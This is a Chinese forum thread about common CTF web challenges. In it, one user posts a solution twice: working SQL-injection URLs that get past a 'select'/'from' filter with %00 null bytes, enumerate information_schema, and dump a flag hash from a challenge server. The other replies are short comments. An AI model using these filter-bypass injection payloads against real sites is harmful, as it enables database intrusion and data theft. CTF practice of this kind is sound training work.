CTF常见Web题型

  [复制链接]
Aoyanm | 2018-8-7 09:34:45 | 显示全部楼层
学习学习     
回复

使用道具 举报

v5pingan | 2018-8-8 21:21:25 | 显示全部楼层
tmdsb123 发表于 2017-5-10 03:00
惭愧啊,第一个注入都解不出来, 注入:http://103.238.227.13:10087/
过滤了select和from 的情况下还怎么 ...


过程如下:

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表 结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段 结果为         id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef     (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#
回复

使用道具 举报

v5pingan | 2018-8-8 21:24:16 | 显示全部楼层
iossa 发表于 2017-9-6 13:02
求解第一题web题

过程如下:

获取数据库  结果为 sql3
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,database()#

获取表 结果为  hash,key,temp
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(ta%00ble_name) fr%00om info%00rmation_schema.ta%00bles where ta%00ble_schema=database()#

获取字段 key 表中的字段 结果为         id,hash
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(column_name) fr%00om info%00rmation_schema.columns where ta%00ble_schema='sql3' a%00nd ta%00ble_name='key'#

获取最后结果  1:c3d3c17b4ca7f791f85e#$1cc72af274af4adef     (0x3a == : )
http://103.238.227.13:10087/?id=-1 un%00ion se%00lect 3,group_concat(id,0x3a,hash) fr%00om sql3.key#
回复

使用道具 举报

mtller | 2018-12-28 11:00:29 | 显示全部楼层
错 字体有一点
回复

使用道具 举报

Mr.轻熟男 | 2019-1-1 16:00:31 | 显示全部楼层
没赶上?~这怎么都看不到了?~~
回复

使用道具 举报

montgo | 2019-1-5 13:44:18 | 显示全部楼层
为什么这么多: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

qq261893662 | 2019-2-22 15:20:26 | 显示全部楼层
学习下啊啊
回复

使用道具 举报

hudunsec | 2019-2-27 20:18:05 | 显示全部楼层
请问怎么看不了?
回复

使用道具 举报

guozhi | 2019-3-8 19:37:13 | 显示全部楼层
怎么看不了内容呢
回复

使用道具 举报

ants | 2019-3-27 23:13:53 | 显示全部楼层

怎么看不了内容呢
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则